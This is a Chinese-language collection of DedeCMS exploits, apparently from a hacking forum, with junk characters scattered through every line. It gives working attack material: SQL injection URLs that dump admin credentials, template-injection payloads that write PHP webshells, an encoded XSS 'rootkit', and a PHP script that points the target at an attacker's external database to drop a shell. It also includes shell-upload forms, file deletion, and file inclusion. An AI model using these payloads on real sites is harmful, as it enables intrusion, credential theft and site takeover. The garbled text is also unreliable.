|
|
2 r7 I9 Y/ n7 C; {9 I7 M+ SDedecms 5.6 rss注入漏洞
$ U: V! I* Y9 a6 y% Y' Chttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
5 {; N1 n* u5 ~' G8 j/ X4 P8 G' e1 G7 @0 Y; w6 e3 @4 Y
9 Z8 ]* p1 m9 I0 \% R) } r4 E
! k% N6 _+ \( V
9 P' g1 B( u0 p) v, C$ F
$ V1 p6 h# N+ |
' ]5 C8 L U- U* ^
" {' G' K$ Q, m9 l1 w S( F, J+ |6 r& Z" O9 g0 Q' O
DedeCms v5.6 嵌入恶意代码执行漏洞) c1 b$ K9 v0 S/ C$ F0 B
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}' k9 b7 Y$ s4 S# y! u5 U* d& j
发表后查看或修改即可执行
! t5 o( L, ^4 N' y! F* `8 ]a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 S$ |; t! i) M) W" `7 ^8 P4 o {
生成x.php 密码xiao,直接生成一句话。, y5 r7 ^% c7 q/ ~/ w
* i4 t) e2 t9 d ]* G$ ?1 `6 o% |
9 u; @7 F; P, G5 ]; m; Z6 }! C$ p/ g+ b; O3 u* c+ Q6 Z
% b. }$ y3 N8 p
) S& z* q, i' I+ f" l2 V1 I0 D2 H" B" k/ q" \4 O# c9 z1 O
, \/ E8 K0 f5 C
8 I( `5 M% P0 C$ Z' j7 |Dede 5.6 GBK SQL注入漏洞
7 [ }; a3 g# F8 x* Z0 mhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
1 X W2 W0 E4 U: w% Z* H7 @) [http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe& ]) o% _. X, C3 ^: C: `1 [
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
+ r! O9 ~! c/ `
, ]- ]$ {. h3 M, @3 j; @% J" | p: ?: T1 O9 k
0 n6 s, F; v% h+ n, d1 b
! _, K2 X) n$ y3 c5 ~) O
2 g" @9 F+ P$ C& t" y* x2 W
8 w, L% Z4 Q+ ^- J) s
- I5 p5 A( B) D1 M
; X; \$ V1 M; Q2 G3 N5 h
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞" U3 N, }" K4 Q1 d# O
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` & A! K" J/ t9 Z2 Z, r4 \& K# j
6 v' x, G0 X, |- j; B# F# D- @4 U* D5 y2 e3 ~5 B0 Q& s: ^. D
, Q1 g5 l7 B$ V
; ^& R- H" ~, b* m
) k2 s* c* y0 I b# \2 `
# L! r0 e9 s7 uDEDECMS 全版本 gotopage变量XSS漏洞
( `! r( C/ n4 `; d! C1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
% a q5 L# J! V' C7 S7 Qhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
( i) k3 \/ ~6 X( |" p, P* Z/ Z6 f. H
/ }0 k( p& F; U' W
( j4 u5 s% m$ m7 D+ h2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
/ [6 p- X1 s# ~+ A H+ @http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
6 R( I3 r- P: B5 O
7 M- N! }) r6 D1 P* \/ g3 D, e8 }% u& t) c3 d9 h& o$ N" i% Z, G: r
http://v57.demo.dedecms.com/dede/login.php8 @' m8 n/ e! A! y: g" u
$ p( {* o" F9 ~8 c6 W7 e, }) ?' G9 F
color=Red]DeDeCMS(织梦)变量覆盖getshell
) m0 f) z& c3 I) _#!usr/bin/php -w' v+ Q* L$ X% X5 @% h( \
<?php
! L* l, J! I9 _error_reporting(E_ERROR);% Q/ ^. T1 _3 p9 n) ?. F
set_time_limit(0); q s6 A, @& L8 g" V
print_r('* p( P: L! s3 o3 n: ^
DEDEcms Variable Coverage
5 R1 u$ z# A" L6 ?4 P6 ^6 uExploit Author: www.heixiaozi.comwww.webvul.com+ |2 o) M& f9 T4 ]5 ?2 c5 r: v9 n
);
7 y }8 q8 \0 m* Q7 Y- Y: \, p- lecho "\r\n";- A. G5 C! u# [9 o) K. A
if($argv[2]==null){' y4 }7 u& d8 J2 \
print_r('
# u) q; T; t0 r$ g6 y6 {+---------------------------------------------------------------------------+
' S4 u! h8 O/ O" _3 B. y; vUsage: php '.$argv[0].' url aid path# h% c7 {9 K: S! J. P
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/. ^) P. ^; `8 |* P/ [9 C
Example:" _7 [; w J+ }" o! I+ u" q' V% X) Z
php '.$argv[0].' www.site.com 1 old, B, t: X: I: C/ i8 H: [2 y( m, u8 A
+---------------------------------------------------------------------------+& A7 a i: H) c) O9 n. P: w
');( u' I6 L. J6 ]; h$ ?; Q: [3 i1 X
exit;' a8 f; `' w* n3 ?- O
}) D' J' n; n# y, v& g% J
$url=$argv[1];
8 g) T3 o% F; A. P# G) t$aid=$argv[2];% n" _* m( f8 N, |0 t4 {
$path=$argv[3];
s5 N6 P* h1 Y X0 g2 B0 z, p$exp=Getshell($url,$aid,$path);8 t$ [, s3 b" T2 A* {6 D
if (strpos($exp,"OK")>12){5 P! G" n5 }5 a4 I- C* z2 c
echo " R7 \# Z8 f9 _9 t9 S
Exploit Success \n";
" m/ J& Y! n g5 f- O3 qif($aid==1)echo "
# `: |& N+ V2 y1 i6 _Shell:".$url."/$path/data/cache/fuck.php\n" ;
& T/ _4 Y$ t/ R9 ?" \, S# Z/ _+ m1 C% s; G7 V" }% J
& A( p3 H! F: E6 p) }1 j" `if($aid==2)echo "" H9 \( ]# h6 t8 x4 v3 Z
Shell:".$url."/$path/fuck.php\n" ;/ Z1 I5 n- x$ l4 h4 U0 D( b
8 C$ ^: d2 J* B" D5 u* U+ w7 Y" U3 i: o* o: h8 E# T1 l( S6 |
if($aid==3)echo "
( U _, u" z$ z, m; k; b/ S+ \Shell:".$url."/$path/plus/fuck.php\n";
; l# [; g6 @$ _& }0 f$ ^* H
( U2 i: B0 b) L$ [/ ?7 d
# E/ o* r" s( \+ _' i: o3 J; M}else{
8 w+ H3 W! ~- ~. l5 a0 @0 E9 becho "9 @1 W% h2 d' K4 c
Exploit Failed \n";# s `. Z* ]4 i, u& G
}
7 @( ?$ M- e( i5 c$ s& H$ z% [function Getshell($url,$aid,$path){
8 `: C- y/ z2 }8 I2 f7 o$id=$aid;0 E$ l+ J4 `! R; d6 `
$host=$url;
7 T0 o: H O; ^: S$port="80";
3 I( M$ r$ z' K3 H8 K) V! H {$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, z/ Y" }* V& e' }' s/ K& M$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
! `+ y/ b" T( n% A, m$data .= "Host: ".$host."\r\n";
# A1 w+ j5 k. H/ p# t$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
' L7 W% C) ?( n$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";5 w7 r% y* ]6 n( b3 x9 G8 u
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";( c) m$ G! J+ a4 @' D) f ]( o# g
//$data .= "Accept-Encoding: gzip,deflate\r\n";, ?* N; v/ f3 I
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";# ? ]* L' N/ N- i0 Q# g
$data .= "Connection: keep-alive\r\n";, |3 B6 R% A- K/ J5 N) M, ?
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 @3 z4 C( }- a4 E$data .= "Content-Length: ".strlen($content)."\r\n\r\n";/ j- E' X8 Q2 u+ X$ {
$data .= $content."\r\n";, P @7 K# X2 K; i L7 x( Z
$ock=fsockopen($host,$port);
- F; K f H* s sif (!$ock) {
0 }( D; K0 w8 ^6 s% S9 T1 Hecho " c/ H" D4 Q8 j' w
No response from ".$host."\n";% J8 {" g! ^# p% W# t) b' Y+ q
}' @: `; F8 B" J( ~
fwrite($ock,$data);
$ W7 _" J" C# Kwhile (!feof($ock)) {+ U r- S( j: Z
$exp=fgets($ock, 1024);6 C# V: Q+ T9 k2 \5 k/ }: X; M$ F }
return $exp;- C. K( h/ O% \6 {& x
}7 P/ \5 ?2 O3 Z; W: X# M+ A
}, l0 i8 k5 U! k
T- C- Y @) |" p5 {
: O' g" n0 u4 W. W' `" Y: f?>. t+ ^. S5 Z: b# C2 x$ y
" P9 U; `& @, R& Q) ?4 V. e9 i8 L4 _+ Y1 R$ q& m
. R7 x" T7 m$ T
8 N: Z! L/ d$ m0 x: q/ ]' p
1 c* K8 C4 w' n- H) L' m
/ R; r* E! _' n/ w- n/ S6 Y* G
' L2 T, q$ `# ?( M3 T9 S' t' m+ G# ^
% n+ w/ T L- }: Y: Q5 v2 H" U1 K, o5 \) {/ L5 g
/ {) Z* i6 E1 V$ g) wDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)3 q q6 P v* q* t; Z
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
* o' s% j4 a. ^ L: f& P( L ~6 }5 T/ a5 E- R
* l1 t' K: h' B5 {把上面validate=dcug改为当前的验证码,即可直接进入网站后台
% f, u1 @% ~7 t) Z% E: i+ G4 q: N2 c, U: U1 f( v
( {- S% r- K& R2 A+ s
此漏洞的前提是必须得到后台路径才能实现
: {9 D3 j- q# Y$ F$ I. a4 ^9 Y2 e- v8 @
b% j @) S, \2 p: y' i6 D8 ~0 I) M% K, a
5 f6 p8 h- Q4 P2 g, b1 _
" M" k2 G) z) t- A
; w! }( h+ j5 q- q: M2 n5 ? V- |' A$ q5 v
9 s$ i0 _: Q# H6 r
! \/ ^; M. y; m# o4 \" ]$ s
% Y7 L y1 s9 ^4 \8 _Dedecms织梦 标签远程文件写入漏洞' q/ ~! C$ D$ I$ h0 S
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');; i. A( G8 R O8 e9 C0 s
' o2 U4 \5 U+ \: m
6 A) r4 b d6 M( _8 {: S# n再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 ) f- u% n6 h+ Y# q9 K7 M
<form action="" method="post" name="QuickSearch" id="QuickSearch">
e/ V. {3 ~" o( L6 y: h" G* w; L, M<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
' r/ L/ n$ y5 V' H) W; h<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
. C1 v4 O# c+ k9 ]: R% j/ k- T<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
. S0 {4 |* E5 |4 b<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />( h9 @5 K, D# Q5 n* _
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
; ~! @8 W- M! ?* b6 j<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 M& U! e6 Y" Z. j( G5 C# g5 i<input type="text" value="true" name="nocache" style="width:400">6 T: D, j, e+ j* t+ Q
<input type="submit" value="提交" name="QuickSearchBtn"><br />& u4 _8 F8 d1 ^8 L/ p1 D3 `4 N
</form>
0 K* H7 c f( `: s( `0 M5 t5 {0 I<script>7 J R; O& Y. S8 I y4 e& w$ w
function addaction()6 |( E) B7 X. a1 U
{2 |# n# F# Z& \* d+ z8 H6 C% s
document.QuickSearch.action=document.QuickSearch.doaction.value;
) P0 r" L2 Y& I& n* q2 y}7 V4 C& c) w* a% p1 R
</script>- W3 ~/ P, ]7 G
: }6 S4 D I" y4 w2 F
' ~' U+ e' j G1 C5 m/ K% Q- M6 ]
8 K( A" {; w- z. X N3 [
5 }/ C: |2 M, B( t4 Y/ X0 y2 i6 b8 W. ~# K/ `- s4 O2 x( }
2 O9 w8 l$ M, k p* V# C
% u6 ` [- A( ^
5 W3 T9 r; ~' F ^2 c. u# ]6 C* k9 _" A( w( u/ w' n
! F9 U0 g X2 o2 M: Q! b2 I( Y4 j2 n
DedeCms v5.6 嵌入恶意代码执行漏洞( V4 K3 X$ D4 O) g
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
8 Z1 G) w0 N" z0 m& k% Ja{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} d+ X+ B- T& n. c% m
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得0 l' q0 H. \4 p6 f/ b R: I, Q7 i
Dedecms <= V5.6 Final模板执行漏洞6 `: I' A/ w( G, T
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
2 |* Y! F1 Q: I8 D1 X* F0 H/ B Quploads/userup/2/12OMX04-15A.jpg
& `. m0 J9 H+ ~) }9 T$ ^$ M
- `3 ~/ E1 v; A/ O% R
5 x% j+ b; A/ ?+ `4 v$ s- g模板内容是(如果限制图片格式,加gif89a):* a9 ~, }. ?7 t
{dede:name runphp='yes'}! f. z4 J1 x' T" j5 K
$fp = @fopen("1.php", 'a');
/ S: V- ?* ]. p/ ^7 I1 L@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");+ n7 h% G9 n/ q4 ~& K# ^( I8 C
@fclose($fp);) W1 n7 c o( v& b& E
{/dede:name}3 L, P4 \% I$ A, U" o3 L6 c
2 修改刚刚发表的文章,查看源文件,构造一个表单:- S6 @% l; j9 j F" M( n( L
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data"> P5 L& P- p( w+ h3 Z. W# c
<input type="hidden" name="dopost" value="save" />
" w, L* m# o# D4 H<input type="hidden" name="aid" value="2" />; C) W! b8 |& ^ a( [( H
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
+ ^" S7 y3 _" p! y& A, g, W2 ?<input type="hidden" name="channelid" value="1" />
3 l; i1 [: E& a; k" y3 k<input type="hidden" name="oldlitpic" value="" />
C3 ?4 y" m/ w: ~- J% i4 r4 |<input type="hidden" name="sortrank" value="1275972263" />+ S1 o5 V2 V: D9 `
% c$ j) F6 c0 L* B
8 [1 F8 {! o7 m& x% f1 q2 k
<div id="mainCp">
3 E' A0 o+ Y- h, l. ]<h3 class="meTitle"><strong>修改文章</strong></h3>9 F8 N9 y G2 M! E, q! @# v: V
6 b. m" A7 [# {- A, g7 Q
# w8 V# y# R2 B8 V- L4 x$ y1 c, \<div class="postForm">* o9 P5 U9 h2 u
<label>标题:</label>
3 ~8 b' L7 @! P<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>) k) \1 B' w5 V& w+ M3 Y4 B/ H6 z
% j* K4 s/ ~7 E! R# U
. ?2 M: i3 B8 G4 }
<label>标签TAG:</label>, e* G$ I2 V; y! V: V. \
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)% e k* q) g2 O8 j9 ?+ s
$ g) s- U1 ~+ x
/ y8 ?, e3 U. H" L' S4 {<label>作者:</label>
+ F. J1 N* d' d' r( f8 I<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>% x% ~9 r8 a- j$ o
6 K6 d' a W* {' H2 {& Z; M' a
% p1 o7 ^+ ]* F$ V* ~; E5 u+ q
<label>隶属栏目:</label>
7 q: G B& m8 D0 z: z<select name='typeid' size='1'>7 E2 f( I3 X( X! w S! k% l
<option value='1' class='option3' selected=''>测试栏目</option>
4 a; h9 [# i* b! ^ n4 q</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
0 F S* K! \- N- o2 A; `. N6 t1 X1 T6 [
3 Z8 u! z8 F; `; ] h! Z
<label>我的分类:</label># ]: e; E; D& l5 t# j
<select name='mtypesid' size='1'>
% \# h$ b7 Y& `. l<option value='0' selected>请选择分类...</option>& R0 |) j j* P0 I% k2 F4 E
<option value='1' class='option3' selected>hahahha</option>: R/ _, w9 f! s1 Y# u1 u9 u6 ?
</select>8 O2 B$ S1 @7 K( u7 o
1 ]: n) T! X& j( K- d" H8 I5 {: R; ^( `' u& a
<label>信息摘要:</label>
& n7 h y8 ~3 Z/ }0 v% d+ d<textarea name="description" id="description">1111111</textarea>8 |% l; O' u5 [, j3 ]; A
(内容的简要说明)# V+ {8 l5 O8 Q D/ y
P( L. \4 `% f( k
# m: P/ I7 e' E6 I/ N# X<label>缩略图:</label>
/ D3 S) f. t5 O/ f. @<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) s2 ^7 y: l' X3 r' O8 |; Y/ P7 U7 J2 D j
, f, g8 x; _& D& V- V
<input type='text' name='templet'$ x; u9 c5 x" |: s& \4 O+ b3 n
value="../ uploads/userup/2/12OMX04-15A.jpg">- S, k1 E+ x2 b3 j/ f( M& G" \
<input type='text' name='dede_addonfields'
. n3 ~' n# ]& f8 a. w6 A1 F' Bvalue="templet,htmltext;">(这里构造)2 z" u5 U* T6 z* ^' r
</div>- P4 U0 \: a. X
7 P! u* D' J- w- \! K
1 {" u p% R. g7 ^<!-- 表单操作区域 --> x _7 o2 Y. i* x4 E' N$ N
<h3 class="meTitle">详细内容</h3>
0 Z1 _9 V- y6 i! R q# M8 c& ^0 Z0 }) Z! P
7 y$ f' a) a2 g, ~4 G' b8 @<div class="contentShow postForm">
9 b5 b. b7 Q! q<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>; U, O7 ?) }# h3 Q
' g. S. r+ a+ l. [0 S- L+ b
+ e& {4 T! u f5 w, p<label>验证码:</label>' {" E, G( ^/ c1 O& `! U
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />; v7 F9 ]# o3 d; K3 k- w3 L
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />9 d5 N) t9 I, X* b; o
+ o* C4 Q% B) L: M" u v I
0 ?. t) H2 ? o& e1 r- u. R2 N<button class="button2" type="submit">提交</button>$ h U" h+ ]" d; m
<button class="button2 ml10" type="reset">重置</button>* n/ ` a; z# m
</div>
3 U+ P. t4 X& Z$ g( B/ a
, ]' J5 e- F: H' k1 G
* `) T8 P q1 z+ C8 A) |0 y</div>
, X" Y: m4 k8 n% A. p
9 v; F' p1 o2 N& R5 P2 T$ O& \0 z
</form>
* ?# }( V' Q- M7 O4 M. ~0 J( ?, l, L C# _
) ]4 G/ {! d K% x提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:% Z" W. I: R9 _# P; j5 t' ?0 }; t
假设刚刚修改的文章的aid为2,则我们只需要访问:
: J5 X' d* ]. M$ H( R M- phttp://127.0.0.1/dede/plus/view.php?aid=2
& }- W( Y$ _ g$ v即可以在plus目录下生成webshell:1.php
! [7 W3 I2 @ b0 K, q
$ x9 \) C* t1 |: \% `9 k9 I' t K a& h1 P! b z) Y5 Y" o
& e9 Y, I" P/ G2 g
7 L" Q5 v7 ^; [) D
9 y$ ~% b w( E# z
$ {1 n+ M. I9 E* R0 j
& b" j5 H% b. N
' v& G. Y/ j9 O4 \
6 S. q( \# J- k: l* U5 b7 o W4 p ~6 @0 o9 V
" ~9 y3 z4 n) _) _
5 D( r: q4 C' m4 p! UDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
+ V! S# D! o+ @3 O- J/ F) [Gif89a{dede:field name='toby57' runphp='yes'}
: l& e4 i7 B# u0 Vphpinfo();( ? ]$ u# v) O* c6 m
{/dede:field}
# Q8 P. Z2 Y" v' W保存为1.gif
7 g0 v: H x: O, s<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> - I3 }, e g# z: d, {
<input type="hidden" name="aid" value="7" /> 1 @2 A* ]0 x. d
<input type="hidden" name="mediatype" value="1" /> o5 i4 a) u- {; \$ a7 Y
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
* c1 @9 X: i5 l; E1 P1 _<input type="hidden" name="dopost" value="save" />
{7 ^( J3 |1 w, [<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> . f1 T' h& B& ~
<input name="addonfile" type="file" id="addonfile"/>
% q7 z! d: V& Q, J0 h3 [* y<button class="button2" type="submit" >更改</button> & `& A! K2 u6 ^% t+ i0 X9 B
</form>
, o# \2 H, _4 m* U; o4 R" d7 u }
4 p6 w! g" w$ u, ~7 q* I1 T+ r# R; }( v: m0 q/ y- [
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif( ^) B" L1 ]" f; ?1 G
发表文章,然后构造修改表单如下:7 N" f8 x8 u5 v$ [, A
4 L0 |6 m5 k! q' l
6 C5 k h1 H7 n8 ` d, A8 |<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
6 j. @. C/ |0 t: Z/ }* o<input type="hidden" name="dopost" value="save" /> ; W) `9 ~3 m% a' S
<input type="hidden" name="aid" value="2" /> 4 e& F* o0 i7 h+ t! _8 S
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> % K! p5 L$ R! C
<input type="hidden" name="channelid" value="1" />
' m8 S7 O( d5 x2 G1 T<input type="hidden" name="oldlitpic" value="" /> - M' Y9 U: l$ i8 A4 J6 m6 F4 V4 e
<input type="hidden" name="sortrank" value="1282049150" />
W" a l, m% m3 L5 E<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
- x% f* J# ^! ^) M% {$ m" j<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
1 l3 k/ j" r; I<select name='typeid' size='1'>
4 Z; ~3 h; l3 }; {<option value='1' class='option3' selected=''>Test</option> 8 z3 q4 u3 x w: I% z' [
<select name='mtypesid' size='1'> ) ]0 P# f3 C2 X3 U
<option value='0' selected>请选择分类...</option>
$ ^; ?$ W" I( X, S( P) K<option value='1' class='option3' selected>aa</option></select> , q6 j" M" O6 D+ t8 i
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> " N3 d n/ z6 B& w5 P
<input type='hidden' name='dede_addonfields' value="templet">
& y7 q# V# v0 t6 {* ]! I9 [' U<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
% @: d" e. O2 C$ `# y# P<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
- v; [8 S; l5 Y& t% u1 R<button class="button2" type="submit">提交</button>
/ L$ |& q6 N: o& y( A</form>, C" G$ ~6 [1 }7 q+ {8 \
- }6 C1 U1 l% y( P) u9 q
, ]! F0 v8 r+ P0 ^$ ?3 I4 e& o+ c
. \8 ]& _1 M; ~1 M9 Y+ B) Y( h3 }0 C" F H$ }' R, c' ]
& h( L- w+ n: i. ~/ [) i7 b' s* T/ @9 A* T1 p7 w7 F
& ]7 l% e, k4 y4 ~9 ~+ u
5 g- H/ n, q8 m4 H8 E9 f: ]* ^. }1 [$ v, c
* ?. z$ W* k( W! i2 r* F1 P
7 }+ [( p( V4 H$ l/ t, T
/ q4 `. ^: W" F; y" G& @织梦(Dedecms)V5.6 远程文件删除漏洞
. ~* b, k. `; q4 ~$ Y$ Ihttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
. w) t; o# a" U! L; i+ r$ k# T$ z: P. ^2 F
# k3 s7 n( m L4 H1 ~* f: R
' U7 Q' S- O; o7 v
3 j3 n# H( }4 N! a
0 c2 ~( y% [' `/ x
3 c0 s2 P2 J ~8 M% l
; }* @( f# Z6 `% L* h8 i( V" J' V2 o% H. F
& D. T$ Z2 W( Z3 l5 o
* W% }& k- b- j0 A' ~' E# v织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
, }) f0 @2 O0 T- nhttp://www.test.com/plus/carbuya ... urn&code=../../
6 S1 M- f) V: A/ J+ h# N8 }$ J7 j3 ]# W
0 Y+ a# A+ T1 s2 z: |5 y( r
7 H0 y) M: ?& o2 B
' z# x- X5 B. h- `3 {
' Y. o P; }8 m! M: t
: |+ m; Y- N) \" U& E# f/ d: M5 Z* m
: I$ c j3 B+ h4 w
3 ?9 x7 \8 |) I' F. ]# j# V
$ H9 {9 Y2 J7 B# vDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ' p! z) h' K4 }8 J
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`; g @9 I/ s% m$ G. d: Y
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
* q$ l' X2 |( K5 k0 \7 n* M4 j, Z
, H1 v9 o6 v! p
, v$ e |4 {! P3 n% j
& C$ V8 k2 ~ |
& K7 ^8 A% R: E7 X: B7 u C/ m S9 S2 D5 [6 B
' p, D' O9 M) Q5 o
9 S) ^& r" [* [& y0 ]5 \: B1 f! j" E, Q
- _0 ~* C" t7 i
' t# Q+ z3 E# i8 g) X织梦(Dedecms) 5.1 feedback_js.php 注入漏洞; D/ ]* B/ D0 U: }
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
: ^8 q B' r) f
! g) p: E4 P& l4 c' z/ f% D! J- w
$ S; E3 f. V ?0 W6 N d1 A
+ Z% T9 L0 `9 c
/ T7 J" }) @. a/ x$ D: Y0 G6 s4 Q& B' n% V
# F; H5 F2 T. g% _; |
$ g' e3 ]2 h j/ M6 {5 r; ?$ r, `( |5 L- i5 B
* s6 X3 A* _, Y+ J8 j
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
' T8 k( |% V9 H<html>7 w$ B$ B$ q" l% [4 L) l ^
<head>2 ]4 e7 X' e/ }! ?5 a
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
$ u( z- ]" u& {& t- |% D</head>: L3 t' {1 V! B$ @# X
<body style="FONT-SIZE: 9pt">
